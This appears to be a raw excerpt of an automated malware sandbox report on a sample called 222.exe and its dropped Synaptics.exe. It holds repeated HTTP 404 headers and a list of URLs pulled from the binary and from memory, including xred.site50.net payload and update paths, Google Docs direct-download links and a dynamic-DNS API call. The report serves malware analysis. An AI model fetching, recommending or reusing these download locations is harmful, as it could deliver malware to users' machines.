                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6w5uigjrW9kriK7rVMEBmuSa14F-uwo4v1Xn595ZO1RBk11YxamTMsKwnJQEnmyiIeContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Lm5OuHaBb70nD6jFd5DyQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC71DCQxEQS7SNdpA_QILkY_Y6NFo1aSaOkftQc2uZD4y1Aql8ZFApcmAL77vpam4UVtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:39 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-cq4LilOi5C6RsfnkmP7YQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46Xyi4K3LTMHVquq3p_69J4YIEE8OFKXCgU1Yj9uJTI_W3Ysyvo2FmVC-fVRCpjA8ZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:40 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-abJbao0U5fB7b42vgHSKVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Yt7hR5gDg96uPAF0VxbzEHgWbr3F5_MrMBHzUEJQiT7uKBaORQSZ0HWfYcwSrd1vPirjEbwkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:40 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-wEtQwri4xkRI5Hkq2OL9uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4492YHstgwuiZknRwSmJSV7jqejVObH0Hn6NAkn15xJhMGgs5hwBlGWx9m6A92nzFSjDvipE0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-flzbECeX3sdxxoTkjvw38w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ZD2Cx3DVUFy7nSi6fvDiXKlZOqEp8XFy2m0EWIYYq3qQXurt96-0IMx2ODAc7xohbJ4KrpboContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:42 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-c6B9Mpd4k73fAg-RclD3Tw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5q5lKU5oBT4DclLz_jqotqnIHT0lBBV6YmTmoTtjlVsfPVzboMSJF3MsSnfWup55O3R63NEnwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:42 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-pDT_6tQV4k4bXDX4wpxhpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7e7H9z2qsHgbMKGXxh38aVLreAZn8YVwa5n9_pN2ZXArwbrJGwQlsDqo77Y2P4y6iIvS8Mh1wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:43 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-1cNiBmbkxIpOQvP7ywr-6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5xC5-j_elhMB8zpAe3XmFDIMgFuZRnbbda2GYDZ9HrI1vsR8jf66Iw4j4ZgMaZyfqmf3C7_Y4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:44 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-0DaGhszLsMyqHqDNZtEhAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6vkG_VJrNfRZUjr7WQR7Qy4Gnbey8YdNo-iPqkUwCNDfspRDEZdh7uw8k29QwfT73JLFRyGF0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:23:58 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-PeJbvPFtp55nRlEa-cUUdQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: RCX6FEC.tmp.0.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978:
                              Source: ._cache_222.exe, 00000002.00000002.3272917400.000000000443D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/Kw
                              Source: Amcache.hve.20.drString found in binary or memory: http://upx.sf.net
                              Source: RCX6FEC.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                              Source: RCX6FEC.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)O
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: RCX6FEC.tmp.0.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000002.2660885130.000000000F1DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/&0pN%
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/.google.com.br
                              Source: Synaptics.exe, 00000003.00000002.2660885130.000000000F1DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0
                              Source: Synaptics.exe, 00000003.00000002.2660885130.000000000F1DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/0li
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/Company
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/GlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/T3
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/com
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/.dartsearch-cn.net
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/m
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/ject.org.cn
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/napps.cn
                              Source: Synaptics.exe, 00000003.00000003.2138173802.00000000055C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/oogle.de
                              Source: Synaptics.exe, 00000003.00000002.2685377013.0000000016ABE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2689765064.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2681827874.00000000142BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2653853811.000000000D63E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2708465947.0000000021C7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2675328024.00000000119FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: RCX6FEC.tmp.0.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.2636824371.0000000002160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: 222.exe, 00000000.00000003.2022602971.00000000024F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
                              Source: Synaptics.exe, 00000003.00000003.2138541996.000000000073F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2701295294.000000001E83E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690925422.0000000019F3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2650002940.000000000AF7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2648162224.0000000009A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2675729817.0000000011D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2683430487.00000000156BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2639882258.000000000576E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2651893959.000000000C4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2649072781.000000000A57E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2683660730.00000000157FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2692458051.000000001AE3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2690677371.0000000019CBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2692818396.000000001B1FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2685010889.00000000166FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2650358265.000000000B47E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2640196549.0000000005C6E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638576923.00000000053EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2701052120.000000001E6FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2663990524.000000000FE7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2700261833.000000001E1FE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2138541996.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000774000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#.
                              Source: Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007AB9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$8_N&
                              Source: Synaptics.exe, 00000003.00000003.2138173802.000000000561A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$k
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
                              Source: Synaptics.exe, 00000003.00000002.2638834850.0000000005530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%;
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%C
                              Source: Synaptics.exe, 00000003.00000002.2635210008.0000000000715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%C#O
                              Source: Synaptics.exe, 00000003.00000002.2657996137.000000000EFF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%f
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007BFB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2657996137.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2659824608.000000000F139000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2661885047.000000000F285000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.00000000055B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.2635210008.00000000006FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&-
                              Source: Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&L
                              Source: Synaptics.exe, 00000003.00000002.2661885047.000000000F295000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2635210008.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2642560934.0000000007A71000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2658828602.000000000F0AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2638834850.0000000005616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
